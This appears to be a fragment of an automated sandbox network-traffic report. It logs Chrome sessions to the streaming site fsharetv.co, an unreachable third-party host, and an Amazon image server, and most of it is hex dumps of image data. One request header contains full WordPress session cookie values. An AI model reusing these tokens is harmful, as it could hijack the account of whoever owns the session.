                                                                                                                                                                                          2024-12-15 11:38:20 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          2024-12-15 11:38:20 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                          2024-12-15 11:38:20 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                          Data Ascii:


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          48192.168.2.1649775104.21.48.14436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:00 UTC538OUTGET / HTTP/1.1
                                                                                                                                                                                          Host: ukankingwithea.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Origin: https://fsharetv.co
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:39 UTC957INHTTP/1.1 522
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:39 GMT
                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                          Content-Length: 15
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ijzHZUkunEzpwE%2BL8XUm2JAnz%2FRobZhpNMDFahVQMITqpEJNzfnwOgVFy09H6hspUlUke0k2YQZ55zdY16eImERNPPRGRWjyLoCCFAlWOGEQ%2B9nTkrNwh2YhrrryvdE2RDCsTM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          Referrer-Policy: same-origin
                                                                                                                                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f26251a6ec58c15-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1770&min_rtt=1765&rtt_var=673&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1116&delivery_rate=1612368&cwnd=238&unsent_bytes=0&cid=db996c29766ab585&ts=39586&x=0"
                                                                                                                                                                                          2024-12-15 11:38:39 UTC15INData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                                                                                                                                                          Data Ascii: error code: 522


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          49192.168.2.1649777151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:00 UTC676OUTGET /images/M/MV5BMzE5MDM1NDktY2I0OC00YWI5LTk2NzUtYjczNDczOWQxYjM0XkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:00 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 12629
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: cee4f732-5e55-4ee5-a4c8-13ec5a87173f
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2016 20:59:51 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Wed, 08 Jun 2044 23:36:42 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2822309
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:00 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kcgs7200067-IAD, cache-ewr-kewr1740045-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:00 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 bd 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 33 00 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 02 03 01 04 00 05 06 07 08 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 00 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f9 5b 06 3d 49 64 c6 6d 19 39 8c 44 e6 31 92
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"3[=Idm9D1
                                                                                                                                                                                          2024-12-15 11:38:00 UTC1378INData Raw: 5d d2 4b 7d e0 9e b7 f3 a7 57 16 75 7c c6 da bb 6d c9 75 15 c6 e7 bd c7 ce 6b 25 36 57 dd df a1 d8 95 6a fc d4 8d 4e cb 55 a9 ad a1 b0 d6 bb d7 ab 62 bd 55 28 72 2a 04 08 6a 89 83 0a 2e 9c 84 ad 13 6a 9b 2b 31 c8 6c e8 6d 4b 26 f6 ae 6b ae 49 b6 7b 3d 2e c6 47 77 b3 d0 6c d0 6e b8 1e b9 05 38 7e 63 a2 e7 fa 13 a2 e4 37 5c 85 39 fb 5e 8b ca 7a 65 6f 5e b3 e6 fd 2f 2f 4f 4c 34 58 bb 29 36 b1 34 a9 59 a8 ed 5e ad aa ae a8 4b 55 55 58 30 28 80 06 34 4d 3c 89 74 48 98 96 4a cd 62 4d 28 e9 5c cd ac 59 a2 f9 d3 65 b0 d2 dc 91 de de d1 dc 99 dc d7 ad 4b 0e 7f 59 b4 d7 5a 75 35 5b 60 bf 1e a6 cd a4 94 db 6c f4 36 a1 d7 d9 6e f8 6e 82 36 dc a2 b0 0c 15 19 59 c0 d6 62 1d 56 b3 5d 00 84 c5 10 06 72 89 a5 c8 ce 89 49 a8 92 cc 34 94 e8 d2 49 a3 bd f5 4e 6f 6e d6 bd f3
                                                                                                                                                                                          Data Ascii: ]K}Wu|muk%6WjNUbU(r*j.j+1lmK&kI{=.Gwln8~c7\9^zeo^//OL4X)64Y^KUUX0(4M<tHJbM(\YeKYZu5[`l6nn6YbV]rI4INon
                                                                                                                                                                                          2024-12-15 11:38:00 UTC1378INData Raw: af 40 61 d3 cc 79 1e 09 e4 d9 3c 3b 87 b7 c1 b1 42 b0 c6 b3 55 ea 3b 6f f6 e0 03 eb 0c 68 61 f6 62 08 b1 62 99 73 01 5b 6d b2 f4 0a 2b 6c 9d 9a cf 14 f2 f8 9d 54 b5 ab 36 fd 40 97 28 35 26 de c1 fc 69 8d 42 bb 36 e6 e1 86 1f 66 20 82 08 a6 64 7d 68 44 22 05 27 c3 1d 74 41 99 88 12 c2 02 27 d3 c8 84 26 57 89 ff 00 65 50 be 9b f0 30 c3 0f b2 10 41 04 06 6e 59 8b e7 b9 62 85 1a 13 1f d7 72 d7 e6 c4 9a 6d 05 78 1a 1b 8e c1 dc dc df 81 30 c3 0f b3 10 41 04 dc 69 61 f0 27 49 e2 1b 62 25 91 6c 9b f0 30 c3 f7 87 cc 20 82 6e 6e 31 8f e1 69 f4 1e 20 ea 6e 2b 45 78 1b 7e 27 d9 8f 00 60 33 73 70 98 de 04 6e 6b 73 8c d7 88 30 19 bf 03 ed b7 37 37 0c 6f b0 b0 4d fb 9d cd cd c6 fb 0b e1 bf 75 b9 bf b2 20 3e 1b f6 e0 16 20 0b b0 0f d4 2b c8 ab 90 ae d5 45 7a cf 9a 59 dd
                                                                                                                                                                                          Data Ascii: @ay<;BU;ohabbs[m+lT6@(5&iB6f d}hD"'tA'&WeP0AnYbrmx0Aia'Ib%l0 nn1i n+Ex~'`3spnks077oMu > +EzY
                                                                                                                                                                                          2024-12-15 11:38:00 UTC1378INData Raw: ec 62 9c 98 db 1e 46 90 e4 51 a8 90 91 14 24 38 8e 23 8b ef 74 a6 e2 dc 07 19 db 24 da da a5 f6 8d 5e 96 24 9f 92 d7 12 5f 16 3f 14 ca b5 69 f8 45 f9 a7 04 da b7 18 0a 03 88 e2 3f 4b f3 73 25 e8 a2 d3 1f a6 f1 4d fa 7b bb e8 ba b5 8f 58 91 c4 a8 ea 47 58 f1 26 a8 ea 5e 05 86 98 f0 5d 9d 3f d8 61 a2 30 14 4a 28 a1 a1 c0 70 34 35 35 35 35 34 34 34 3a c5 8c 58 c5 11 47 96 8a 28 d4 d4 d0 d0 d0 d0 d0 d0 d0 d4 51 28 a1 17 ed a2 8a 28 d4 a2 8a 28 af 65 f1 45 14 34 57 17 c5 7b 68 a2 b9 ff c4 00 26 11 00 03 00 02 02 02 02 02 02 03 01 00 00 00 00 00 00 01 02 03 11 12 13 10 21 04 20 05 31 14 22 30 41 51 32 ff da 00 08 01 03 01 01 08 00 d2 34 8d 23 48 d1 a3 48 d2 34 8e 27 13 8a 38 a3 48 e2 8e 28 e2 8e 08 e2 84 cd 9b 36 6f fc 3b f1 b3 67 23 62 a3 97 d3 46 8d 1a 34 6b
                                                                                                                                                                                          Data Ascii: bFQ$8#t$^$_?iE?Ks%M{XGX&^]?a0J(p45555444:XG(Q(((eE4W{h&! 1"0AQ24#HH4'8H(6o;g#bF4k
                                                                                                                                                                                          2024-12-15 11:38:00 UTC1378INData Raw: 2e bd 4f 7f 49 94 c9 86 0c ab 32 3c f1 5b db c3 98 2d 1f 74 34 ae 11 96 1f b2 17 34 a4 7b 13 1a 41 9a 91 5e d5 b2 d9 c4 0b b1 0c 24 0a b7 2a 5f f1 33 21 38 f9 ea fe d6 d0 99 b9 b7 d1 19 a0 ed f4 32 b0 77 b1 1f 05 b2 90 33 c6 65 19 61 ed 13 ec 3a 39 30 91 0d ae 4b 96 e9 e8 de 54 6b 6e e3 60 b6 bb c3 27 37 0c f8 a6 ef 68 b6 c3 1e 98 4c 76 a7 00 f1 3b b5 cb 8a 31 04 d7 2a 77 a7 37 7f 34 e6 8a 73 8d 49 d5 39 b4 e2 7e c9 ed fd 55 c3 e1 29 ed 33 60 0d 7a 6d fe af 80 fd 13 49 ae 8b 96 45 bb ca 80 d6 dd c6 c9 e3 69 19 0a 3b b1 76 d8 0e 92 9e d7 e1 b8 05 50 36 ee 36 09 c1 e2 72 bd 78 18 51 8b 39 30 3a 02 b8 d3 f0 74 72 39 35 6f 01 17 e3 f6 40 1d f3 32 24 1a 90 99 b3 07 50 c8 4d 05 ce 00 50 69 64 e1 8a 0e e5 cf 5e 41 7f cd 7c 4e 5f 13 7e 8b e0 fa 95 63 43 e7 82 b6
                                                                                                                                                                                          Data Ascii: .OI2<[-t44{A^$*_3!82w3ea:90KTkn`'7hLv;1*w74sI9~U)3`zmIEi;vP66rxQ90:tr95o@2$PMPid^A|N_~cC
                                                                                                                                                                                          2024-12-15 11:38:00 UTC1378INData Raw: c9 6d 7d 44 10 63 f4 16 89 74 a1 74 15 d2 fc 07 44 5c b8 e4 ce 2d 4e 14 f7 bc fb 1c a9 c3 d9 36 13 69 88 3f a0 df fe 1d 92 07 ee 58 3e b0 36 25 77 1b 29 ba 45 53 3f 3c 5e c2 e8 28 83 43 43 1a 1e af 49 d0 b4 42 17 50 71 f8 ce 7f 48 dc 5c 91 e8 b6 79 1c 8c e5 23 83 f2 e3 e4 66 36 d9 7b 6e 8c b5 3d d3 62 37 81 9c 2f 82 e2 b2 e3 fd 6e 88 eb 8b 6b 19 7d b0 2e 12 61 cf e4 7f b8 37 3d 8b 0f 8a fb 77 d6 51 06 31 a1 8c 7d 08 5a a1 6a b5 1b 51 2a d5 da cf c8 84 9e f1 cf cb b7 81 98 e6 e5 f2 71 c6 67 77 65 36 f9 3b b0 ca 7e 3d e8 c7 bb 8e 57 b1 18 d2 77 c2 bf c8 de 7f cd ff 00 5a d9 7c 97 8e cc 4b 0b fb 41 ed ec 2a e8 ec 63 1f 43 d1 74 2d 50 ba 0b e8 a7 df fd 12 65 81 bb 8e 3b 0b e7 2e e2 d1 8b 0f ef 22 bb 6d 92 ee ff 00 d2 fc b3 14 99 3e cf 66 bb 3f b6 5e 6a 57 b6
                                                                                                                                                                                          Data Ascii: m}DcttD\-N6i?X>6%w)ES?<^(CCIBPqH\y#f6{n=b7/nk}.a7=wQ1}ZjQ*qgwe6;~=WwZ|KA*cCt-Pe;."m>f?^jW
                                                                                                                                                                                          2024-12-15 11:38:00 UTC1378INData Raw: db 47 d8 84 35 48 bb 11 63 46 8f 7f 5e e9 7a 18 c9 1c 6b 66 9c 68 66 cd b7 5b dd b7 5b e8 82 d1 f4 32 f4 52 f4 26 b9 45 29 4a 52 97 a5 32 e8 a5 29 74 a2 7a d2 97 4a 5f 42 88 a5 29 4a 52 e8 ba 52 94 a5 29 4a 52 94 a5 29 4a 52 94 a5 29 4a 5d 69 74 5d 57 d5 ba 52 e9 4a 52 e9 7a 69 75 ba 52 94 a5 29 4a 52 94 a5 29 4a 5d 29 4a 52 94 a5 2e af a2 f4 5d 69 e7 7d 7c 90 b9 fd 13 e5 f4 79 bf 4c f3 3e 8e e6 05 5e c8 e2 af a1 b2 c4 fc 1e 67 d1 e2 7f 42 77 0f e8 db 25 cc e7 b7 fc 19 45 9c 22 3e df 83 cc fa 29 c3 fa 1f 61 fd 1e 67 d1 e0 7f 43 ab 7d 2f a9 44 a5 c1 36 12 ef 73 7d b9 c9 2e cc 9d b8 8f f9 fe 0a a9 de 3c 2e f7 f9 c9 6f e2 97 64 25 16 69 b2 43 46 92 af 2d 76 12 32 b8 bb f7 bd b8 39 a3 8e 38 5f 1e 45 e6 9b f7 63 db e0 7a 24 8f a7 fb c8 dc 04 5f ae 0c 1f d9 f4
                                                                                                                                                                                          Data Ascii: G5HcF^zkfhf[[2R&E)JR2)tzJ_B)JRR)JR)JR)J]it]WRJRziuR)JR)J])JR.]i}|yL>^gBw%E">)agC}/D6s}.<.od%iCF-v298_Ecz$_
                                                                                                                                                                                          2024-12-15 11:38:00 UTC1378INData Raw: 1e 31 a7 23 74 c1 8f 58 5e 2a eb e9 4d df 4e 39 e4 cb e3 95 78 9a 7e 4b 63 d6 7b 33 d6 59 78 97 26 78 98 c3 1f 18 c9 82 61 8f d6 30 de 1c ab ae f8 31 19 a4 98 7d a5 fa c4 11 f6 b0 ac 74 32 cd d7 e6 97 5f 84 9d f9 0e 72 cf 59 78 75 e0 79 be 06 31 dc c7 c7 21 c3 76 d4 8e f0 c1 4d 7d 07 74 b7 cf c0 c0 c9 d1 9f 11 44 dd a1 fd af 7a f8 36 bf 70 5d 20 fd 32 d0 7f 4e b7 e3 5c 66 f7 87 e0 3f ac ba ca 65 97 0c 63 1f 5c 03 4e 01 8d fc 24 ee 33 f4 cc 0a 4f 95 98 81 75 b2 67 18 dd 4d db 78 6e f1 7b 01 9f f6 cd 14 f4 f5 8d ba da 9b d8 fc 1b 38 ce b8 0e 07 78 cf 7b de 03 c8 77 8e b8 38 0f c0 98 bb b9 5e 8b f8 6e 94 ad dd e1 de b5 fc 0b 91 89 26 5d 1a bc d5 14 57 e0 bf ac 9d bd 23 eb f6 bf 66 f0 02 84 0d 11 ec 77 c0 e3 95 d1 e6 23 0f bc 91 ce 4d 33 9d ef de 18 2e 86 31
                                                                                                                                                                                          Data Ascii: 1#tX^*MN9x~Kc{3Yx&xa01}t2_rYxuy1!vM}tDz6p] 2N\f?ec\N$3OugMxn{8x{w8^n&]W#fw#M3.1
                                                                                                                                                                                          2024-12-15 11:38:00 UTC1378INData Raw: a6 f3 7a 13 d1 d1 5f 93 c4 82 eb 8f fa cb 03 51 cb c4 bc 2e 5d 72 e7 5e 07 ff 00 67 cf 09 d1 08 52 77 ef 34 db 79 24 b4 7c c7 e6 16 e3 f7 70 d8 5f f9 43 c3 98 a3 75 0e 42 9b 05 73 15 15 d0 3e 8b 49 22 3d e2 24 f4 c5 38 28 ef f3 8e 59 f6 64 31 de 98 30 61 d6 b2 5b 88 16 47 a0 2a 05 0a 78 1a 37 89 ef 1c 1d 45 53 a0 ed c0 2c 75 d6 92 42 03 83 8a b1 0a 59 4f 89 2a c1 b1 bd a5 ef d2 8f 84 e9 9d 3f 73 e3 a8 b8 ee 04 77 b7 49 90 3b e8 3e 5d f0 27 74 c0 bd bb fa b8 ca 07 de b2 c1 98 35 74 5b 20 7e d4 cb bd 0e 0b bf a5 27 65 e6 15 db 1d fd 7b 3c 2b f8 27 c9 65 31 dc dd 49 3e c1 a0 fd 76 c2 8f a4 c4 fe 54 1f f5 f8 33 fc c5 72 20 bd 29 34 19 e1 0c c2 bb 61 ab 3b 41 11 00 ae 8c d1 6a b6 0c 88 a1 87 5e a7 b0 87 98 35 6e a6 b2 4b b3 83 08 2c b1 eb d3 3d 35 cb 8c e5 e1
                                                                                                                                                                                          Data Ascii: z_Q.]r^gRw4y$|p_CuBs>I"=$8(Yd10a[G*x7ES,uBYO*?swI;>]'t5t[ ~'e{<+'e1I>vT3r )4a;Aj^5nK,=5
                                                                                                                                                                                          2024-12-15 11:38:00 UTC227INData Raw: e5 70 1e a7 ce 9f 33 89 93 4d 27 09 c0 c8 c1 81 80 fb c1 c7 ff 00 c0 df 63 22 6a f0 18 bc 93 4d 30 66 38 38 bc 4e 0e 1c 17 4d ff c4 00 24 11 00 01 03 02 04 07 00 00 00 00 00 00 00 00 00 00 00 01 31 71 10 40 11 21 60 61 20 30 32 41 50 51 70 ff da 00 08 01 02 01 09 3f 00 f1 ed 66 9f 65 c9 6c a4 ed a5 d3 7b 3f 47 56 23 13 47 7e 72 e6 c3 b8 a2 ed 59 e2 92 74 87 ff c4 00 22 11 00 02 02 01 03 04 03 00 00 00 00 00 00 00 00 00 00 01 11 31 21 10 60 61 20 30 40 51 02 32 50 ff da 00 08 01 03 01 09 3f 00 df 6f c3 f8 f8 77 b7 d9 5f 8b 66 56 dc b1 47 75 74 59 3e c7 82 7d 89 cf d9 92 4e 73 da bd 1f 23 b4 31 e2 25 f4 56 8e 1e 8f ad 8f 81 f0 3c 14 c5 a6 07 28 70 87 8b 1f 23 d9 ff 00 ff d9
                                                                                                                                                                                          Data Ascii: p3M'c"jM0f88NM$1q@!`a 02APQp?fel{?GV#G~rYt"1!`a 0@Q2P?ow_fVGutY>}Ns#1%V<(p#


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          50192.168.2.1649779172.67.131.1404436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:00 UTC742OUTGET /img/fsharetv.png HTTP/1.1
                                                                                                                                                                                          Host: fsharetv.co
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
                                                                                                                                                                                          2024-12-15 11:38:01 UTC904INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:01 GMT
                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                          Content-Length: 4334
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=1800
                                                                                                                                                                                          Last-Modified: Tue, 15 Aug 2023 08:09:50 GMT
                                                                                                                                                                                          ETag: W/"10ee-189f83e7726"
                                                                                                                                                                                          CF-Cache-Status: REVALIDATED
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I4KgipgdUNlKdG9GVQFVN0GnZRrzeJX%2B77GnPVghHfJVm%2BrDjwrJwdrxvpqHh%2FonUUqmOJ1GdVwNRjI%2B7JtZ0W3LhcVduOuuDCGWFl92CwQxNsL9wb6AVXzBle9FNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f26251c693d17ad-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1638&rtt_var=634&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1320&delivery_rate=1698662&cwnd=171&unsent_bytes=0&cid=3ca15d7173d79943&ts=619&x=0"
                                                                                                                                                                                          2024-12-15 11:38:01 UTC465INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 06 00 00 00 ad 58 ae 9e 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 10 83 49 44 41 54 78 5e ed 9d 5b 6c 1c d5 1d c6 47 88 12 b5 8a 6a 41 2f 86 52 d8 0a 8a dc 0b d4 2a 50 ac 50 8a 05 2d 71 8b 10 2b 10 65 69 8b 62 41 a0 a6 50 94 5e e5 07 c8 9e dd 45 32 55 a0 0e 57 97 8b 88 45 69 42 15 05 87 70 31 44 14 d3 42 9b 52 2a 42 84 a8 29 45 c4 a2 4d 9c f0 e2 47 bf 4e bf ff 99 b3 ab d9 b3 67 d6 bb de 99 f1 7a f7 fb 49 9f 76 77 ce 65 ce cc fe bf 39 73 e6 ea 11 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 10 42 08 21 84 90 38 38 52 f2 86 8f 96
                                                                                                                                                                                          Data Ascii: PNGIHDRXsRGBgAMAapHYsodIDATx^[lGjA/R*PP-q+eibAP^E2UWEiBp1DBR*B)EMGNgzIvwe9sB!B!B!B!B!B!B!88R
